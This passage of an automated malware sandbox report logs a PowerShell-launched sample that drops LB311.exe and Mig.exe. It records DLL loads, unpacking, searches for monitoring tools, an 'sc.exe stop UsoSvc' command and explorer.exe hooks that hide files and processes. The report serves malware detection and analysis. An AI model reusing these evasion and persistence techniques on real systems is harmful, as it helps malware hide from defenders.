        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\LB311.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\LB311.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dllJump to behavior
        Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dllJump to behavior
        Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\dialer.exeSection loaded: ntmarta.dll
        Source: C:\ProgramData\Mig\Mig.exeSection loaded: apphelp.dll
        Source: C:\ProgramData\Mig\Mig.exeSection loaded: winmm.dll
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dll
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dll
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dll
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dll
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dll
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dll
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dll
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dll
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wbemcomn.dll
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: amsi.dll
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: profapi.dll
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wscapi.dll
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: urlmon.dll
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: iertutil.dll
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: srvcli.dll
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: netutils.dll
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: slc.dll
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sppc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: LB311.exe, 00000006.00000002.1883280158.00007FF62EC4A000.00000040.00000001.01000000.00000009.sdmp
        Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: LB311.exe, LB311.exe, 00000006.00000002.1883280158.00007FF62EC4A000.00000040.00000001.01000000.00000009.sdmp, Mig.exe

        Data Obfuscation

        barindex
        Detected unpacking (changes PE section rights)
        Source: C:\Users\user\AppData\Roaming\LB311.exeUnpacked PE file: 6.2.LB311.exe.7ff62e6f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ndryujmp:EW;tnyudguu:EW;.pdata:R; vs :ER;.rsrc:W;Kh:W; :EW;ndryujmp:EW;tnyudguu:EW;.pdata:R;
        Source: C:\ProgramData\Mig\Mig.exeUnpacked PE file: 40.2.Mig.exe.7ff746290000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ndryujmp:EW;tnyudguu:EW;.pdata:R; vs :ER;.rsrc:W;@:W; :EW;ndryujmp:EW;tnyudguu:EW;.pdata:R;
        Source: initial sampleStatic PE information: section where entry point is pointing to: tnyudguu
        Source: LB311.exe.0.drStatic PE information: section name:
        Source: LB311.exe.0.drStatic PE information: section name: .idata
        Source: LB311.exe.0.drStatic PE information: section name:
        Source: LB311.exe.0.drStatic PE information: section name: ndryujmp
        Source: LB311.exe.0.drStatic PE information: section name: tnyudguu
        Source: LB311.exe.0.drStatic PE information: section name: .pdataI
        Source: Mig.exe.6.drStatic PE information: section name:
        Source: Mig.exe.6.drStatic PE information: section name: .idata
        Source: Mig.exe.6.drStatic PE information: section name:
        Source: Mig.exe.6.drStatic PE information: section name: ndryujmp
        Source: Mig.exe.6.drStatic PE information: section name: tnyudguu
        Source: Mig.exe.6.drStatic PE information: section name: .pdataI
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFB4AC7D2A5 pushad ; iretd 3_2_00007FFB4AC7D2A6
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFB4AE62316 push 8B485F92h; iretd 3_2_00007FFB4AE6231B
        Source: C:\Windows\System32\winlogon.exeCode function: 35_2_000002E99173ACDD push rcx; retf 003Fh35_2_000002E99173ACDE
        Source: C:\Windows\System32\winlogon.exeCode function: 35_2_000002E99176C6DD push rcx; retf 003Fh35_2_000002E99176C6DE
        Source: C:\Windows\System32\winlogon.exeCode function: 35_2_000002E991759FA4 push rbp; retf 35_2_000002E99176626B
        Source: C:\Windows\System32\winlogon.exeCode function: 35_2_000002E991766130 push rbp; retf 35_2_000002E991766133
        Source: C:\Windows\System32\winlogon.exeCode function: 35_2_000002E991766138 push rsi; retf 35_2_000002E991766143
        Source: C:\Windows\System32\winlogon.exeCode function: 35_2_000002E991766100 push rbp; retf 35_2_000002E99176610B
        Source: C:\Windows\System32\winlogon.exeCode function: 35_2_000002E991766100 push rbp; retf 35_2_000002E99176610B
        Source: C:\Windows\System32\winlogon.exeCode function: 35_2_000002E9917660F0 push rbp; retf 35_2_000002E9917660F3
        Source: C:\Windows\System32\winlogon.exeCode function: 35_2_000002E9917660E0 push r14; retf 35_2_000002E9917660EB
        Source: C:\Windows\System32\winlogon.exeCode function: 35_2_000002E991766198 push rbp; retf 35_2_000002E99176619B
        Source: C:\Windows\System32\winlogon.exeCode function: 35_2_000002E991766180 push rbp; retf 35_2_000002E991766183
        Source: C:\Windows\System32\winlogon.exeCode function: 35_2_000002E991766160 push rbp; retf 35_2_000002E991766163
        Source: C:\Windows\System32\winlogon.exeCode function: 35_2_000002E991766168 push rsi; retf 35_2_000002E9917661D3
        Source: C:\Windows\System32\winlogon.exeCode function: 35_2_000002E991766038 push r14; retf 35_2_000002E991766043
        Source: C:\Windows\System32\winlogon.exeCode function: 35_2_000002E991766008 push rsi; retf 35_2_000002E99176602B
        Source: C:\Windows\System32\winlogon.exeCode function: 35_2_000002E9917660A8 push rbp; retf 35_2_000002E9917660AB
        Source: C:\Windows\System32\winlogon.exeCode function: 35_2_000002E991766080 push rbp; retf 35_2_000002E991766083
        Source: C:\Windows\System32\winlogon.exeCode function: 35_2_000002E991766070 push rbp; retf 35_2_000002E991766073
        Source: C:\Windows\System32\winlogon.exeCode function: 35_2_000002E991766078 push rbp; retf 35_2_000002E991766083
        Source: C:\Windows\System32\winlogon.exeCode function: 35_2_000002E991766238 push rbp; retf 35_2_000002E99176623B
        Source: C:\Windows\System32\winlogon.exeCode function: 35_2_000002E991766218 push rbp; retf 35_2_000002E99176621B
        Source: C:\Windows\System32\winlogon.exeCode function: 35_2_000002E991766208 push rsi; retf 35_2_000002E99176620B
        Source: C:\Windows\System32\winlogon.exeCode function: 35_2_000002E991766168 push rsi; retf 35_2_000002E9917661D3
        Source: C:\Windows\System32\winlogon.exeCode function: 35_2_000002E9917662C8 push rbp; retf 35_2_000002E9917662B3
        Source: C:\Windows\System32\winlogon.exeCode function: 35_2_000002E9917662C8 push rbp; retf 35_2_000002E9917662CB
        Source: C:\Windows\System32\winlogon.exeCode function: 35_2_000002E9917662B0 push rbp; retf 35_2_000002E9917662B3
        Source: C:\Windows\System32\lsass.exeCode function: 41_2_00000213BDCCACDD push rcx; retf 003Fh41_2_00000213BDCCACDE
        Source: C:\Windows\System32\lsass.exeCode function: 41_2_00000213BDCFACF1 pushfq ; iretd 41_2_00000213BDCFACF2
        Source: C:\Windows\System32\lsass.exeCode function: 41_2_00000213BDCFAC43 pushfq ; iretd 41_2_00000213BDCFAC62
        Source: C:\Users\user\AppData\Roaming\LB311.exeFile created: C:\ProgramData\Mig\Mig.exeJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\LB311.exeJump to dropped file
        Source: C:\Users\user\AppData\Roaming\LB311.exeFile created: C:\ProgramData\Mig\Mig.exeJump to dropped file

        Boot Survival

        barindex
        Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
        Source: C:\Users\user\AppData\Roaming\LB311.exeWindow searched: window name: FilemonClassJump to behavior
        Source: C:\Users\user\AppData\Roaming\LB311.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
        Source: C:\Users\user\AppData\Roaming\LB311.exeWindow searched: window name: RegmonClassJump to behavior
        Source: C:\Users\user\AppData\Roaming\LB311.exeWindow searched: window name: FilemonClassJump to behavior
        Source: C:\Users\user\AppData\Roaming\LB311.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
        Source: C:\Users\user\AppData\Roaming\LB311.exeWindow searched: window name: RegmonclassJump to behavior
        Source: C:\ProgramData\Mig\Mig.exeWindow searched: window name: FilemonClass
        Source: C:\ProgramData\Mig\Mig.exeWindow searched: window name: PROCMON_WINDOW_CLASS
        Source: C:\ProgramData\Mig\Mig.exeWindow searched: window name: RegmonClass
        Source: C:\ProgramData\Mig\Mig.exeWindow searched: window name: FilemonClass
        Source: C:\ProgramData\Mig\Mig.exeWindow searched: window name: PROCMON_WINDOW_CLASS
        Source: C:\Users\user\AppData\Roaming\LB311.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

        Hooking and other Techniques for Hiding and Protection

        barindex
        Hooks files or directories query functions (used to hide files and directories)
        Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
        Hooks processes query functions (used to hide processes)
        Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
        Hooks registry keys query functions (used to hide registry keys)
        Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
        Loading BitLocker PowerShell Module
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Modifies the prolog of user mode functions (user mode inline hooks)
        Source: explorer.exeUser mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
        Uses an obfuscated file name to hide its real file extension (double extension)
        Source: Possible double extension: png.ps1Static PE information: GO.png.ps1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
